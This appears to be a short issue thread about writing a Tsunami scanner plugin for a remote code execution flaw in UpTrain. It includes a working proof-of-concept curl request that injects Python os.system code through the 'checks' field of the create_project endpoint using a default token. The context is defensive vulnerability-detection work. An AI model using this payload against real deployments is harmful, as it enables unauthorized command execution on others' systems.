AI PRP: RCE in UpTrain

[lanced00m]

Hi
I want to start working on this RCE instead of my previous PR, I already explained why we can't write a tsunami plugin for my previous PR.

this time I already checked if we can write a plugin for the UpTrain platform and I think no issue prevents me from writing a tsunami plugin for this platform.

@tooryx Please assign this PR as my main AI PRP request.

[tooryx]

Hi @lanced00m,

Could you provide more information about the vulnerability itself first?

~tooryx

[lanced00m]

@tooryx We can execute system commands with a simple HTTP request like this:

curl 'http://localhost:4300/api/public/create_project' \
  -H 'Accept: */*' \
  -H 'Accept-Language: en-US,en' \
  -H 'Connection: keep-alive' \
  -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundarysFz2W1h9iMH4IFs9' \
  -H 'Origin: http://localhost:3000' \
  -H 'Referer: http://localhost:3000/' \
  -H 'uptrain-access-token: default_key' \
  --data-raw $'------WebKitFormBoundarysFz2W1h9iMH4IFs9\r\nContent-Disposition: form-data; name="model"\r\n\r\ngpt-3.5-turbo\r\n------WebKitFormBoundarysFz2W1h9iMH4IFs9\r\nContent-Disposition: form-data; name="project_name"\r\n\r\nasdf\r\n------WebKitFormBoundarysFz2W1h9iMH4IFs9\r\nContent-Disposition: form-data; name="checks"\r\n\r\n__import__(\'os\').system(\'touch /tmp/aaaaaaaaaaaa\')\r\n------WebKitFormBoundarysFz2W1h9iMH4IFs9\r\nContent-Disposition: form-data; name="dataset_name"\r\n\r\nasdf\r\n------WebKitFormBoundarysFz2W1h9iMH4IFs9\r\nContent-Disposition: form-data; name="data_file"; filename="test.jsonl"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundarysFz2W1h9iMH4IFs9\r\nContent-Disposition: form-data; name="metadata"\r\n\r\n{"gpt-3.5-turbo":{"openai_api_key":"asdf"}}\r\n------WebKitFormBoundarysFz2W1h9iMH4IFs9--\r\n'

[tooryx]

Hi @lanced00m,

You can work on this request.

~tooryx